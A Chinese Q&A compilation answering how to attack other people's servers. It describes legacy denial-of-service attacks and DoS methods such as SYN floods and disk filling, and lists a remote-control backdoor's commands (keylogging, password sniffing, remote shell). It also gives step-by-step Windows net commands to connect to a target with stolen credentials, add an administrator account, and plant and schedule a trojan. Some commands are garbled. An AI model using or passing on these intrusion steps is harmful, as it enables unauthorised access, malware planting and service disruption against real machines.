⑴ 怎么攻击别人服务器
1.OOB攻击 这是利用NETBIOS中一个OOB(Out of Band)的漏洞而来进行的,它的原理是通过TCP/IP协议传递一个数据包到计算机某个开放的端口上(一般是137、138和139),当计算机收到这个数据包之后就会瞬间死机或者蓝屏现象,不重新启动计算机就无法继续使用TCP/IP协议来访问网络。 2.DoS攻击 这是针对Windows 9X所使用的ICMP协议进行的DOS(Denial of Service,拒绝服务)攻击,一般来说,这种攻击是利用对方计算机上所安装协议的漏洞来连续发送大量的数据包,造成对方计算机的死机。 3.WinNuke攻击 目前的WinNuke系列工具已经从最初的简单选择IP攻击某个端口发展到可以攻击一个IP区间范围的计算机,并且可以进行连续攻击,还能够验证攻击的效果,还可以对检测和选择端口,所以使用它可以造成某一个IP地址区间的计算机全部蓝屏死机。 4.SSPing 这是一个IP攻击工具,它的工作原理是向对方的计算机连续发出大型的ICMP数据包,被攻击的机器此时会试图将这些文件包合并处理,从而造成系统死机。 5.TearDrop攻击 这种攻击方式利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击,由于IP分段中含有指示该分段所包含的是原包哪一段的信息,所以一些操作系统下的TCP/IP协议在收到含有重叠偏移的伪造分段时将崩溃。TeadDrop最大的特点是除了能够对Windows 9X/NT进行攻击之外,连Linux也不能幸免。 另外,也可以对指定服务器进行漏洞检测,一般服务器上都搭有网站,可尝试对该站进行注入过旁注之类的,或者利用最新漏洞进行溢出攻击! 方法有很多,脑子要灵活! BY :bbs.77169.com 怪马
满意请采纳
⑵ 什么是DOS攻击,DOS攻击的命令有哪些,攻击的方式有哪些
DOS,是Denial of Service的简称,即拒绝服务,不是DOS操作系统,造成DOS的攻击行为被称为DOS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DOS攻击有计算机网络带宽攻击和连通性攻击。
DOS攻击类型有哪些?常见方式如下:
SYN FLOOD
利用服务器的连接缓冲区,利用特殊的程序,设置TCP的header,向服务器端不断地成倍发送只有SYN标志的TCP连接请求。当服务器接收的时候,都认为是没有建立起来的连接请求,于是为这些请求建立会话,排到缓冲区队列中。
如果SYN请求超过了服务器能容纳的限度,缓冲区队列满,那么服务器就不再接收新的请求;其他合法用户的连接都被拒绝,可以持续SYN请求发送,直到缓冲区中都是自己的只有SYN标志的请求。
IP欺骗
DOS攻击这种攻击利用RST位来实现的,比如现在有一个合法用户已经同服务器建立正常连接,攻击者构造攻击的TCP数据,伪装自己的IP为正常ip,向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后,认为从合法用户发送的连接有错误,就会清空缓冲区中建立好的连接。这时,如果合法用户再发送合法数据,服务器就已经没有这样的连接了,该用户必须重新开始建立连接。
带宽DOS攻击
如果连接带宽足够大而服务器又不是很大,可以发送请求,来消耗服务器的缓冲区消耗服务器的带宽。这种攻击就是人多力量大,配合上SYN一起实施DOS,威力巨大。
自身消耗的DOS攻击
这种是老式的攻击手法。说老式,是因为老式的系统有这样的自身BUG,比如win 95这样的系统。这种DOS攻击就是把请求客户端IP和端口弄成主机的IP端口相同,发送给主机。使得主机给自己发送TCP请求和连接。这种主机的漏洞会很快地把资源消耗光,直接导致宕机。这种伪装对一些身份认证系统威胁还是很大的。
塞满服务器的硬盘
如果服务器可以没有限制地执行写操作,那么都能成为塞满硬盘造成DOS攻击的途径:
1、发送垃圾邮件:一般公司的服务器可能把邮件服务器和Web服务器都放在一起,破坏者可以发送大量的垃圾邮件,这些邮件可能都塞在一个邮件队列中或者就是坏邮件队列中,直到邮箱被撑破或者把硬盘塞满。
2、让日志记录满:入侵者可以构造大量的错误信息发送出来,服务器记录这些错误,可能就造成日志文件非常庞大,甚至会塞满硬盘。同时会让管理员痛苦地面对大量的日志,甚至就不能发现入侵者真正的入侵途径。
3、向匿名FTP塞垃圾文件,这样也会塞满硬盘空间。
⑶ 用什么dos命令在有IP,用户名,和密码的攻击对方
DOS命令下的入侵命令大全
DOS
切换到MS-DOS提示符
DIR/LS/LIST
目录/文件列表
CD
进入目录
MD/MKDIR
创建目录
PWD
查看当前目录
COPY/CP
复制目录/文件
DEL/RM
删除目录/文件
REN
重命名文件
MOVE/MV
移动目录/文件
TYPE/CAT
查看文本内容
POPMSG
弹出系统对话框
SYSINFO
查看系统基本信息
WHO/W
查看当前所有链接者IP
SHELL
通过系统SHELL执行CMD命令
EXEC/RUN
通过WINDOWS
API
运行程序
WS
查看窗口列表
PS
查看进程列表
KILL
强行关闭进程
GET/GETFILE
通过WOLLF直接下载文件
PUT/PUTFILE
通过WOLLF直接上传文件
WGET
从HTTP服务器下载文件
FGET
从FTP服务器下载文件
FPUT
向FTP服务器上传文件
TELNET
连接到其它安装本服务的机器
FTPD
启动FTP服务
TELNETD/TELD/EXPOPT
在新端口上输入SHELL
REDIR
绑定TCP端口,并转发接收到的所有数据
REDIR_STOP
停止端口转发
SNIFF
鉴听局域网内FTP/SMTP/POP3/HTTP
密码《该功能只对XP和2000有限》
SNIFF_STOP
停止鉴听密码
KEYLOG
启动键盘记录
KEYLOG_STOP
停止键盘记录
REBOOT
重启系统
SHUTDOWN
关闭系统
EXIT
断开当前链接
QUIT
断开所有链接并停止服务
REMOVE
卸载服务
VERVERSION
版本信息
HELP/H/?
帮助信息
建立IPC$共享的命令
net
use
\目标IPipc$
"账号密码"
/user:账号
添加管理员账号命令
net
user
用户名
密码
/add
添加到管理员组
再次运行命令
net
localgroup
administrators
用户名
/add
返回远程主机当前时间
net
time
\远程主机IP
在远程主机1:00启动muma.exe这个服务
at
\远程主机IP
1:00
muma.exe
远程拷贝命令:1.把本地C盘下的muma.exe复制到目标IP的C盘下命令格式为:
muma.exe
\目标IPc$muma.exe
2.把本地C盘下的muma.exe复制到目标IP的WINNT目录里面命令为:
muma.exe
\目标IPadmin$muma.exe
启动TELNET服务命令为:net
start
telnet
关闭TELNET服务命令为:net
stop
telnet
查看计算机上账号列表:net
user
把GUEST用户激活:net
user
guest
/active:yse
把GUEST的密码改为123:
net
userguest
123
关闭对方的NT服务器命令:
shutdown
\目标IP
time
注:time是重启时间
查看对方机器系统类型:type
c:oot.ini
查看对方机器IP:ipconfig
/all
与对方建立共享并映射驱动驱到本地Z盘:net
use
z:
\192.168.0.1c$
"7788"
/user:"administrator"